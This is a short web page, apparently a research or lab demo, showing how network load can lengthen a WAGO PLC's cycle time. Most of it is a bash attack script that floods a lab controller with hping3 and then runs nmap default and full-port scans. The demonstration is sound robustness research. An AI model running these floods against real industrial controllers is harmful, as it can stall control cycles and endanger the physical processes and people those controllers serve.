PLC Cycle Time Attack
Demo of how communication load can influence the cycle time of a PLC.
- Default main cyclic task is used.
- Cycle time is set to 1ms.
- Every 250 cycles the next output is set.
Attack on different PLCs
Attack Code
#!/bin/bash # Attack Script for WAGO PLC # Make sure only root can run our script if [ "$(id -u)" != "0" ]; then echo "This script must be run as root" 1>&2 exit 1 fi # Check if device is reachable echo "=====================================" echo "Check if device is reachable" fping -c1 -t1000 10.0.0.2 2>/dev/null 1>/dev/null if [ "$?" = 0 ] then echo "Host rechable" else echo "Host not rechable" exit 1 fi # Idle echo "=====================================" echo "Idle for 20s" sleep 20s read -p "Press any key for flooding..." # Flooding full echo "=====================================" echo "Hping3 flood for 20s" echo "hping3 --flood 10.0.0.2" timeout 20 hping3 --flood 10.0.0.2 &> /dev/null # Idle 5s echo "=====================================" echo "Idle for 5s" sleep 5s read -p "Press any key for hping3 with delay..." # Hping with delay echo "=====================================" echo "Hping3 with delay between packets for 20s" echo "hping3 -i u1100 10.0.0.2" timeout 20 hping3 -i u1100 10.0.0.2 &> /dev/null # Idle 5s echo "=====================================" echo "Idle for 5s" sleep 5s read -p "Press any key for standard nmap..." # Standard nmap scan echo "=====================================" echo "Standard nmap scan for a maximum of 20s" echo "nmap 10.0.0.2" timeout 20 nmap 10.0.0.2 &> /dev/null # Idle 5s echo "=====================================" echo "Idle for 5s" sleep 5s read -p "Press any key for full port scan..." # Standard nmap full port scan echo "=====================================" echo "Standard nmap full port scan for a maximum of 20s" echo "nmap -p- 10.0.0.2" timeout 20 nmap -p- 10.0.0.2 &> /dev/null # End echo "=====================================" echo "End of script" read -p "Press any key to exit..."
Leave a Reply